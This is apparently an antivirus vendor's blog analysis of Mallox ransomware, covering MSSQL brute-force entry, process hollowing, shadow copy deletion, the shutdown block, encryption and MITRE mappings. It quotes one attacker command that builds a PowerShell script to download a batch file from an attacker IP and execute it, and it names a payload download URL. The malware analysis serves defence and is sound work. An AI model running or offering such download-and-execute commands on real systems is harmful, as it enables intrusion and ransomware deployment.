First observed in the middle of 2021, ‘Mallox’ Ransomware has emerged as a formidable threat in the cyber crime landscape. With its ability to encrypt all volumes, including local and network shared drives, it gradually spreads its control over the system, leaving victims in a state of digital despair.
Mallox Ransomware uses the “.mallox” extension on the encrypted files as it drops its ‘ransom note’ with the name – “File Recovery.txt” which contains the unique “tor” link for further communication between the attacker and the unsuspecting users.
In this blog, we will take you deep into our research of the Mallox Ransomware, to help you understand how stealthily it works, as well as update you on how to stay protected from it.
Our investigation indicates that Mallox (aka TargetCompany) Ransomware is currently targeting unsecured Microsoft SQL Servers as an attack vector to infiltrate victims’ systems and distribute the ransomware.
Furthermore, we have noticed multiple instances of failed and erroneous attempts on publicly exposed MSSQL servers to gain initial access to the victims’ network. This pattern is indicative of MSSQL brute force attacks, and also highlights the pivotal role these servers play as the primary point of entry into the victim’s system.
It is observed that, as it gains initial access to the unsecured MSSQL instance via brute force attacks, it uses MSSQL service ‘sqlservr.exe’ command line to infiltrate the malicious files and payload onto the victim’s machine.
“C:\WINDOWS\\System32\\cmd.exe” /C echo $cl = New-Object System.Net.WebClient >%TEMP%\updt.ps1 & echo $cl.DownloadFile(“http[:]//43[.]138[.]76[.]102/Mfhigwwvsie[.]bat”, “%TEMP%\tzt.bat”) >> %TEMP%\updt.ps1 & powershell -ExecutionPolicy Bypass %TEMP%\updt.ps1 & WMIC process call create “%TEMP%\tzt.bat”
During the execution of tzt.bat it injects the ransom code in the Aspnet_Complier.exe and then it drops and executes the killer.bat file which deletes all the unwanted services and kills all the tasks so that the encryption process is successful.
Bat file executes the .NET payload “Mfhigwwvise.exe”; which is responsible for the injection of ransomware code.
During the analysis of .NET payload, it was discovered that it downloads another encrypted VDF payload from the “hxxps://files.catbox.moe/r6piiq.vdf, which is encrypted with AES Cipher – As shown in the figure below.
This further decrypts directly into the memory.
The Decrypted DLL file is further obfuscated with an IntelliLock obfuscator. The loader now loads the decrypted ransomware DLL into another process using the process hollowing technique.
After creating the thread pool, the loader then uses the InvokeMember() function to inject and execute the ransomware code into Aspnet Compler.exe.
The injected payload pf the Mallox Ransomware is the main module that contains the country check, Deletion on of the shadow copy, Termination of running processes, and encryption.
Firstly, It checks the default language ID for the current user to exclude some countries from the targeted attack.
It then creates the threads. The first thread will delete Registry keys and then it deletes the Shadow copy as shown in below:
The second thread will modify the Boot Configuration, and terminates some of the hardcoded processes.
After this, the third thread will remove SQL-Related Services’ used command line. As shown in the figure below:
Upon attempting to shut down or reboot the PC, it displays a warning message to the user stating: ‘Do NOT shutdown OR reboot your PC: this might damage your files permanently!’
It modifies the Windows registry to prevent users from shutting down or restarting the system. By configuring specific registry values, it disables the Shutdown, Restart, and Sign-out options, effectively blocking users from performing these actions.
Exfiltration System Information
Mallox Ransomware can exfiltrate the data from a targeted system prior to its encryption. Similar to the prevailing approach of numerous other contemporary ransomware groups, it operates a website for the purpose of exposing data owned by victims who decline to meet their ransom demands. It collects system information and transfers it to the C2C.
Encryption threads are created based on the number of existing processors, with a maximum limit of 64 threads.
Folders and Files Exclusion:
It traverses all the folders and uses API “FindFirstFileExW”. to exclude the whitelisted folders. This helps the system work properly after encryption. Accordingly, it excludes the whitelisted files and extensions from the encryption process. It also excludes the ransom note “File Recovery.txt” from the encryption process.
The Ransomware note, labelled “File Recovery.txt“, is created in all the folders. This note provides an Onion link for communication with the attackers for decryption, as shown below:
Run TOR browser and open the site:
It uses sala20 Encryption algorithm to encrypt the samples
After encryption, it appends “.Mallox” as a file extension.
By adhering to these precautions, we can significantly reduce the risk of Mallox Ransomware attacks targeting Microsoft SQL Server instances and bolster the overall security posture of our environment.
Quick Heal AntiVirus has signatures for various script files utilized in the attack, as well as for the Ransom payload. The signatures against this Ransomware are as indicated below:
To know more about Quick Heal’s range of digital protection visit –
As cyberthreats grow in sophistication, the Mallox Ransomware emerges as a stealthy and ever-evolving adversary.
Its strategy is clear, to target unguarded MSSQL Servers as its starting point. Once inside, it unleashes a complex infection chain using the combination of malicious files to inject chaos into the system’s processes under the shroud of encryption.
The Mallox Ransomware, with its intricate threads of malevolence, preys on vulnerability, turning your digital world into a high-stakes battleground. A typical digital hostage situation, where the demand is clear – your precious data or payment for freedom!
Quick Heal’s signature-based protection offers a defense against this ransomware variant.
|Command and Scripting Interpreter||T1059|
|Inhibit System Recovery||T1490|
|File and Directory Discovery||T1083|
|System Information Discovery||T1082|
|Data Encrypted for Impact||T1486|